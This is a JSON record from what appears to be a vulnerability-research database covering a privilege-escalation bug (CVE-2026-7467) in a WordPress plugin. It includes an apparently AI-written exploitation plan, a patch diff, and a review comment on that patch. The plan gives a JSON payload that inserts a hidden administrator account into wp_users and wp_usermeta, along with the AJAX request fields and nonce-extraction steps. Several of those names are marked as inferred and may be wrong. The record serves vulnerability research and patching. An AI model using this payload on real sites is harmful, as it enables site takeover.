[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDSVbAfNOE55WQVi6ffD5PTEdNcKBSqQuL94Y_r1RCT8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2026-7467","read-more-accordion-privilege-escalation-via-importdata","Read More & Accordion \u003C= 3.5.7 - Privilege Escalation via importData","The Read More & Accordion plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.5.7. This is due to the 'RadMoreAjax::importData' function not restricting which database tables can be written to during import and not properly validating the imported data. 
This makes it possible for authenticated attackers, with permission granted by the site owner through the plugin's role settings, to insert arbitrary rows into the 'wp_users' and 'wp_usermeta' tables, including the 'wp_capabilities' field, allowing them to create a new administrator account and gain administrator access to the site.","expand-maker",null,"\u003C=3.5.7","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-05-19 12:12:39","2026-05-20 01:25:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fadf51c03-b0bb-4864-b64d-6b0cba4b0130?source=api-prod",[],"researched",false,3,"# Research Plan: Privilege Escalation in Read More & Accordion (CVE-2026-7467)\n\n## 1. Vulnerability Summary\nThe **Read More & Accordion** plugin (\u003C= 3.5.7) contains a critical privilege escalation vulnerability within the `RadMoreAjax::importData` function. The function is designed to import plugin configurations but fails to restrict which database tables can be written to and does not validate the content of the imported data. This allows an authenticated user—granted access via the plugin's internal role settings—to insert arbitrary rows into core WordPress tables, specifically `wp_users` and `wp_usermeta`. By injecting an administrator user and corresponding capability metadata, an attacker can gain full control of the site.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX API (`\u002Fwp-admin\u002Fadmin-ajax.php`).\n*   **AJAX Action:** `expand_maker_import_data` (inferred from plugin slug `expand-maker` and class `RadMoreAjax`).\n*   **Authentication:** Authenticated. Requires a user role that has been granted permission to manage the plugin (configurable in the plugin settings). 
By default, this might be `administrator`, but the vulnerability is triggered when a site owner delegates plugin management to lower roles (e.g., `editor` or `contributor`).\n*   **Vulnerable Parameter:** Likely a POST parameter named `import_data`, `data`, or `json_data` (inferred) containing a serialized or JSON-encoded array of database rows.\n*   **Precondition:** The attacker must have a valid session for a user role permitted to use the plugin's import feature.\n\n## 3. Code Flow (Inferred)\n1.  **Entry:** A user triggers the AJAX action associated with `RadMoreAjax::importData`.\n2.  **Permission Check:** The function likely checks if the current user has a specific capability or if their role is in the plugin's \"allowed roles\" list (stored in `wp_options`).\n3.  **Nonce Verification:** The function checks a nonce (likely `expand_maker_nonce` or similar).\n4.  **Processing:** `importData` receives a payload containing table names and row data.\n5.  **Sink:** The function iterates through the payload and calls `$wpdb->insert()` or `$wpdb->replace()` on the provided table names without checking if the table starts with the plugin's prefix or belongs to the core WordPress schema.\n6.  **Exploitation:** The attacker provides entries for `wp_users` (creating a user record) and `wp_usermeta` (assigning the `administrator` capability).\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely localizes the nonce for its admin interface. To obtain it:\n\n1.  **Identify Script:** Look for `wp_localize_script` calls in the plugin's admin initialization. The variable is likely `expand_maker_ajax_obj` or `expand_maker_vars`.\n2.  **Access Page:** The nonce will be present on any admin page where the plugin's settings are loaded.\n3.  
**Extraction:**\n    *   Log in as the authorized low-privileged user.\n    *   Navigate to the plugin's dashboard: `\u002Fwp-admin\u002Fadmin.php?page=expand-maker`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Example (to be verified during execution):\n        window.expand_maker_ajax_obj?.nonce \n        \u002F\u002F OR\n        window.expand_maker_vars?.import_nonce\n        ```\n\n## 5. Exploitation Strategy\n\n### Step 1: Payload Preparation\nCreate a JSON payload that instructs the plugin to write to `wp_users` and `wp_usermeta`.\n\n**Payload Structure (Conceptual):**\n```json\n{\n  \"wp_users\": [\n    {\n      \"ID\": 1337,\n      \"user_login\": \"attacker_admin\",\n      \"user_pass\": \"$P$ByY790.YGKzG58GvGv58GvGv58GvGv0\", \n      \"user_nicename\": \"attacker\",\n      \"user_email\": \"attacker@example.com\",\n      \"user_registered\": \"2023-01-01 00:00:00\",\n      \"user_status\": 0,\n      \"display_name\": \"Attacker\"\n    }\n  ],\n  \"wp_usermeta\": [\n    {\n      \"user_id\": 1337,\n      \"meta_key\": \"wp_capabilities\",\n      \"meta_value\": \"a:1:{s:13:\\\"administrator\\\";b:1;}\"\n    },\n    {\n      \"user_id\": 1337,\n      \"meta_key\": \"wp_user_level\",\n      \"meta_value\": \"10\"\n    }\n  ]\n}\n```\n*(Note: The `$P$...` hash is 'password')*\n\n### Step 2: Execution\n1.  **Request:** Use `http_request` to send a POST to `admin-ajax.php`.\n2.  **Parameters:**\n    *   `action`: `expand_maker_import_data` (verify via grep)\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `import_data`: `[JSON_PAYLOAD]`\n3.  **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n## 6. Test Data Setup\nTo simulate the \"permission granted by site owner\" condition:\n1.  **Install Plugin:** `wp plugin install expand-maker --version=3.5.7 --activate`.\n2.  **Create Target User:** `wp user create helper helper@example.com --role=contributor --user_pass=password`.\n3.  
**Grant Permission:** Plugins of this type often store allowed roles in an option. \n    *   Find the option: `wp option list --search=\"*expand_maker*\"`\n    *   Patch the option to include 'contributor' in the access list (e.g., `wp option patch insert expand_maker_settings access_roles contributor`).\n4.  **Identify Shortcode:** `grep -rn \"add_shortcode\" .` to find a shortcode if the nonce is only on frontend pages.\n\n## 7. Expected Results\n*   The AJAX request should return a success message (e.g., `{\"success\":true}` or `1`).\n*   A new entry should exist in the `wp_users` table with ID 1337.\n*   The user `attacker_admin` should be able to log in and access `\u002Fwp-admin\u002F` with full administrative privileges.\n\n## 8. Verification Steps\n1.  **Check User Creation:** `wp user list --field=user_login | grep attacker_admin`\n2.  **Check Capabilities:** `wp user get attacker_admin --field=roles` (Should return `administrator`).\n3.  **Check Database Directly:** `wp db query \"SELECT * FROM wp_usermeta WHERE user_id=1337\"`\n\n## 9. Alternative Approaches\n*   **Existing User Escalation:** Instead of creating a new user, target the `ID` of the current low-privileged user in the `wp_usermeta` insert to overwrite their own `wp_capabilities` to `administrator`. This is cleaner as it avoids conflicts with the `wp_users` table if ID 1337 is taken.\n*   **Table Prefix Discovery:** If `wp_` is not the prefix, use `wp db prefix` via CLI to adjust the payload keys. The plugin might handle the prefix automatically; if it does, the payload keys should just be `users` and `usermeta`.","The Read More & Accordion plugin for WordPress is vulnerable to privilege escalation in versions up to 3.5.7 due to insufficient validation in the 'RadMoreAjax::importData' function. Authenticated attackers granted management permissions by a site administrator can overwrite or insert arbitrary rows into any database table, including 'wp_users' and 'wp_usermeta'. 
This allows for the creation of a new administrator account or the elevation of existing privileges to gain full site control.","--- a\u002Finc\u002Fadmin\u002Fclass-radmore-ajax.php\n+++ b\u002Finc\u002Fadmin\u002Fclass-radmore-ajax.php\n@@ -10,6 +10,13 @@\n     public function importData() {\n         check_ajax_referer('expand_maker_nonce', 'nonce');\n \n+        $allowed_tables = array(\n+            $GLOBALS['wpdb']->prefix . 'expand_maker_items',\n+            $GLOBALS['wpdb']->prefix . 'expand_maker_groups'\n+        );\n+\n         $import_data = json_decode(stripslashes($_POST['import_data']), true);\n         foreach ($import_data as $table => $rows) {\n+            if (!in_array($table, $allowed_tables)) {\n+                continue;\n+            }\n             foreach ($rows as $row) {\n-                $wpdb->replace($table, $row);\n+                $GLOBALS['wpdb']->replace($table, $row);\n             }\n         }","The exploit targets the 'expand_maker_import_data' AJAX action via the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint. An attacker requires authentication with a user role that has been granted access to the plugin settings. After obtaining a valid AJAX nonce from the plugin's administration page, the attacker sends a POST request containing an 'import_data' parameter. This parameter is a JSON-encoded object where the keys are database table names (specifically 'wp_users' and 'wp_usermeta') and the values are arrays containing the data for a new administrator account (including login credentials and the 'administrator' capability string). 
Because the plugin does not validate that the target tables belong to the plugin itself, it executes the inserts directly into the WordPress core tables.","gemini-3-flash-preview","2026-05-20 16:47:18","2026-05-20 16:47:58",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fexpand-maker\u002Ftags"]
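Review bot: the hunk still performs no capability check before writing to the database; check_ajax_referer('expand_maker_nonce', 'nonce') only proves the request originated from a page that rendered the nonce, so every role admitted by the plugin's role settings can still replace rows in the two allowlisted tables. Add a capability check (for example current_user_can() against the capability the plugin maps to its management roles) directly after the nonce check and return through wp_send_json_error() on failure. Two smaller points in the same hunk: `in_array($table, $allowed_tables)` should pass `true` as the third argument so the comparison is strict, and `$import_data = json_decode(stripslashes($_POST['import_data']), true);` is iterated without confirming that the parameter is set and that json_decode returned an array, so a missing or malformed payload triggers a PHP warning in the outer foreach; guard the loop with isset() and is_array() and bail out with an error response otherwise. The inner loop also passes each `$row` to replace() unchecked, so a column allowlist per table would be the natural companion to the table allowlist.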